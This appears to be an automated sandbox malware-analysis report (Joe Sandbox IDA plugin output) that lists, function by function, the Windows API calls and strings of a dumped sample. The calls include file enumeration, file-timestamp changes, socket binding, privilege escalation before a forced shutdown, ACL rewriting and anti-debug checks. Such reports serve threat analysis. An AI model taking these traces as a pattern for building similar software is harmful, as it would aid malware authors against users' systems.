Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F6D0
Part of subcall function 0040F5D9: HeapFree.KERNEL32(00000000), ref: 0040F6DD
Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000000,0040BF20), ref: 0040F6E2
Part of subcall function 0040F5D9: HeapFree.KERNEL32(00000000), ref: 0040F6E9

lstrcatW.KERNEL32(0041CD24,00000000), ref: 0040BC84
FindFirstFileW.KERNEL32(0041CD24,?), ref: 0040BC8E
StrRChrW.SHLWAPI(?,00000000,0000002E), ref: 0040BCD3
FindNextFileW.KERNEL32(?,?), ref: 0040BD84
FindFirstFileW.KERNEL32(0041CD24,?), ref: 0040BD90
GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0040BDDB
HeapFree.KERNEL32(00000000), ref: 0040BDDE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BDE8
HeapFree.KERNEL32(00000000), ref: 0040BDEB
GetProcessHeap.KERNEL32(00000000,0041CD24,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BDFA
HeapFree.KERNEL32(00000000), ref: 0040BDFD
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BE07
HeapFree.KERNEL32(00000000), ref: 0040BE0A

Strings

:PEU, xrefs: 0040BBAF
fPoU, xrefs: 0040BBD7

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040DAD5, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 179

APIs

GetSystemTime.KERNEL32(?,00000000,?,00000000), ref: 0040DAF2
SystemTimeToFileTime.KERNEL32(?,?,0000003B), ref: 0040DBA6
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DBAD
SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0040DBB6
GetProcessHeap.KERNEL32(00000008,00000069), ref: 0040DC31
HeapAlloc.KERNEL32(00000000), ref: 0040DC38
ReleaseCapture.USER32 ref: 0040DC47

Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
Part of subcall function 0040D97F: HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
Part of subcall function 0040D97F: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040DC8F
GetFileTime.KERNEL32(00000000,?,?,00000016), ref: 0040DCAA
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DCBB
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DCC8
SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0040DCD5
CloseHandle.KERNEL32(00000000), ref: 0040DCDC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DCE5
HeapFree.KERNEL32(00000000), ref: 0040DCEC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DCF5
HeapFree.KERNEL32(00000000), ref: 0040DCFC

Strings

8W1/, xrefs: 0040DBF9
sV8K, xrefs: 0040DC07
Us[8, xrefs: 0040DBC6
2[e\, xrefs: 0040DC00
28e1, xrefs: 0040DC26
2@eT, xrefs: 0040DC15
deBs, xrefs: 0040DBD4

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040D4CA, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 224

APIs

GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040D50E
HeapAlloc.KERNEL32(00000000), ref: 0040D515
GetDesktopWindow.USER32 ref: 0040D524
CoInitialize.OLE32(00000000), ref: 0040D553
CoCreateInstance.OLE32(00410380,00000000,00000001,00410370,?), ref: 0040D572
StrStrIW.SHLWAPI(00000000), ref: 0040D634
StrStrIW.SHLWAPI(00000000,00000000), ref: 0040D668
StrStrIW.SHLWAPI(00000000,00000000), ref: 0040D6B3
StrCpyNW.SHLWAPI(?,00000002,-000000FE), ref: 0040D6D1
GetFileAttributesW.KERNEL32(?), ref: 0040D6DE
CoTaskMemFree.OLE32(00000000), ref: 0040D6FA
CoTaskMemFree.OLE32(00000000), ref: 0040D6FF
CoTaskMemFree.OLE32(00000001), ref: 0040D70B
CoTaskMemFree.OLE32(?), ref: 0040D71B
CoUninitialize.OLE32 ref: 0040D74C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040D754
HeapFree.KERNEL32(00000000), ref: 0040D75B

Strings

nku, xrefs: 0040D5C0
g1Q3)@, xrefs: 0040D541

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040C5E5, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 105

APIs

WSAStartup.WS2_32(00000202,?), ref: 0040C600
socket.WS2_32(00000002,00000001,00000000), ref: 0040C60D
GetCurrentProcessId.KERNEL32 ref: 0040C622
GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040C675
HeapAlloc.KERNEL32(00000000), ref: 0040C67C
GetProcessWindowStation.USER32 ref: 0040C692
inet_addr.WS2_32(00000000), ref: 0040C6C1
htons.WS2_32(?), ref: 0040C6CC
bind.WS2_32(?,?,00000010), ref: 0040C6E7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C6F4
HeapFree.KERNEL32(00000000), ref: 0040C6FB
closesocket.WS2_32(?), ref: 0040C717
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C720
HeapFree.KERNEL32(00000000), ref: 0040C727

Strings

Z\tj61knCD, xrefs: 0040C686
knCD, xrefs: 0040C6A9
61, xrefs: 0040C66A

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00401D22, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85

APIs

GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401D6F
HeapAlloc.KERNEL32(00000000), ref: 00401D72
GetMenuCheckMarkDimensions.USER32 ref: 00401D83
GetCurrentProcess.KERNEL32(00000028,?), ref: 00401DAE
OpenProcessToken.ADVAPI32(00000000), ref: 00401DB5
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 00401DC3
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00401DE2
ExitWindowsEx.USER32(00000006,00000000), ref: 00401DF1
ExitWindowsEx.USER32(00000004,00000000), ref: 00401E01
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E06
HeapFree.KERNEL32(00000000), ref: 00401E09

Strings

!, xrefs: 00401D46
vniVk, xrefs: 00401D99
3k, xrefs: 00401D5E

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0042C925, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 172

APIs

__getptd.LIBCMT ref: 0042C92D

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

_TranslateName.LIBCMT ref: 0042C964

Part of subcall function 0042C8E9: _strlen.LIBCMT ref: 0042C8EB
Part of subcall function 0042C8E9: _GetPrimaryLen.LIBCMT ref: 0042C905
Part of subcall function 0042C8E9: EnumSystemLocalesA.KERNEL32(0042C796,00000001,0042C996,00000083,?,000000BC,?,004270F1,?,000000BC,?), ref: 0042C914

_TranslateName.LIBCMT ref: 0042C9A8

Part of subcall function 0042C882: _strlen.LIBCMT ref: 0042C884
Part of subcall function 0042C882: _strlen.LIBCMT ref: 0042C897
Part of subcall function 0042C882: _GetPrimaryLen.LIBCMT ref: 0042C8BA
Part of subcall function 0042C882: EnumSystemLocalesA.KERNEL32(0042C5C5,00000001,0042C9C6), ref: 0042C8C9

_strlen.LIBCMT ref: 0042C9DD
EnumSystemLocalesA.KERNEL32(0042C4C3,00000001,00000083,?,000000BC,?,004270F1,?,000000BC,?), ref: 0042C9F5
GetUserDefaultLCID.KERNEL32(00000083,?,000000BC,?,004270F1,?,000000BC,?), ref: 0042CA0E

Part of subcall function 0042C3CE: GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C40D
Part of subcall function 0042C3CE: GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C436
Part of subcall function 0042C3CE: GetACP.KERNEL32(?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C44A

IsValidCodePage.KERNEL32(00000000,?,004270F1,?,000000BC,?), ref: 0042CA60
IsValidLocale.KERNEL32(?,00000001,?,004270F1,?,000000BC,?), ref: 0042CA73
__itow_s.LIBCMT ref: 0042CB02

Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641

GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,004270F1,?,000000BC,?), ref: 0042CADD
GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,?,004270F1,?,000000BC,?), ref: 0042CAF1

Strings

Norwegian-Nynorsk, xrefs: 0042CAB2

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0040D8BA, Relevance: 13.6, APIs: 9, Instructions: 84

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0040D8EA
SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0040D920
LocalAlloc.KERNEL32(00000040,00000014), ref: 0040D92A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0040D934
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0040D941
SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0040D94B
FreeSid.ADVAPI32(00000000), ref: 0040D95A
LocalFree.KERNEL32(00000000), ref: 0040D96F
LocalFree.KERNEL32(00000000), ref: 0040D976

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0042C5C5, Relevance: 12.2, APIs: 8, Instructions: 179

APIs

__getptd.LIBCMT ref: 0042C5DD

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

_LcidFromHexString.LIBCMT ref: 0042C5EA
GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C610
GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C651
_strlen.LIBCMT ref: 0042C69D
GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C6F4
_strlen.LIBCMT ref: 0042C731
_TestDefaultLanguage.LIBCMT ref: 0042C760

Part of subcall function 0042C56A: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 0042C58B
Part of subcall function 0042C56A: _GetPrimaryLen.LIBCMT ref: 0042C5AC
Part of subcall function 0042C56A: _strlen.LIBCMT ref: 0042C5B4

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 004244D8, Relevance: 10.7, APIs: 7, Instructions: 155

APIs

___crtGetLocaleInfoA.LIBCMT ref: 00424522
GetLastError.KERNEL32 ref: 00424530
___crtGetLocaleInfoA.LIBCMT ref: 00424549
___crtGetLocaleInfoA.LIBCMT ref: 00424584

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641

GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 0042460D

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 0042462D

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3

GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 00424669

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0040468D, Relevance: 10.6, APIs: 7, Instructions: 71

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004046A6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?), ref: 004046DA
GetCurrentProcess.KERNEL32(00000028,?), ref: 004046EA
OpenProcessToken.ADVAPI32(00000000), ref: 004046F1
LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00404701
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?), ref: 00404731
CloseHandle.KERNEL32(?), ref: 0040473C

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0041FFF1, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58

APIs

IsDebuggerPresent.KERNEL32 ref: 00423AF2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

cC, xrefs: 00423B0D

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042C3CE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C40D
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C436
GetACP.KERNEL32(?,?,0042CA37,?,004270F1,?,000000BC,?), ref: 0042C44A

Strings

OCP, xrefs: 0042C3EE
ACP, xrefs: 0042C3DD

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 004244D8, Relevance: 7.7, APIs: 5, Instructions: 155

APIs

___crtGetLocaleInfoA.LIBCMT ref: 00424522
GetLastError.KERNEL32 ref: 00424530
___crtGetLocaleInfoA.LIBCMT ref: 00424549
___crtGetLocaleInfoA.LIBCMT ref: 00424584

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 00424669

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0042B9C8, Relevance: 6.1, APIs: 4, Instructions: 91

APIs

GetLocaleInfoW.KERNEL32(00000080,?,00000000,00000000,?,?,?,00000080,?,?,00000080), ref: 0042B9F8

Part of subcall function 0042BB4E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00424C51,00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE), ref: 0042BB93

GetLocaleInfoW.KERNEL32(00000080,?,00000000,00000080,?,?,00000080,?,?,00000080), ref: 0042BA61
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00000000,00000000,00000000,?,?,00000080,?,?,00000080), ref: 0042BA7F
__freea.LIBCMT ref: 0042BA88

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042C796, Relevance: 6.1, APIs: 4, Instructions: 78

APIs

__getptd.LIBCMT ref: 0042C7AD

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

_LcidFromHexString.LIBCMT ref: 0042C7BA
GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C7DA
_TestDefaultLanguage.LIBCMT ref: 0042C826

Part of subcall function 0042C56A: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 0042C58B
Part of subcall function 0042C56A: _GetPrimaryLen.LIBCMT ref: 0042C5AC
Part of subcall function 0042C56A: _strlen.LIBCMT ref: 0042C5B4

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042C796, Relevance: 6.1, APIs: 4, Instructions: 78

APIs

__getptd.LIBCMT ref: 0042C7AD

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

_LcidFromHexString.LIBCMT ref: 0042C7BA
GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C7DA
_TestDefaultLanguage.LIBCMT ref: 0042C826

Part of subcall function 0042C56A: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 0042C58B
Part of subcall function 0042C56A: _GetPrimaryLen.LIBCMT ref: 0042C5AC
Part of subcall function 0042C56A: _strlen.LIBCMT ref: 0042C5B4

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0042C882, Relevance: 6.0, APIs: 4, Instructions: 37

APIs

_strlen.LIBCMT ref: 0042C884
_strlen.LIBCMT ref: 0042C897
_GetPrimaryLen.LIBCMT ref: 0042C8BA
EnumSystemLocalesA.KERNEL32(0042C5C5,00000001,0042C9C6), ref: 0042C8C9

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 004224C7, Relevance: 4.6, APIs: 3, Instructions: 75

APIs

IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 004225B1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004225BB
UnhandledExceptionFilter.KERNEL32(?), ref: 004225C8

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042C4C3, Relevance: 4.6, APIs: 3, Instructions: 58

APIs

__getptd.LIBCMT ref: 0042C4DA

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

_LcidFromHexString.LIBCMT ref: 0042C4E3
GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C506

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042C4C3, Relevance: 4.6, APIs: 3, Instructions: 58

APIs

__getptd.LIBCMT ref: 0042C4DA

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

_LcidFromHexString.LIBCMT ref: 0042C4E3
GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C506

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
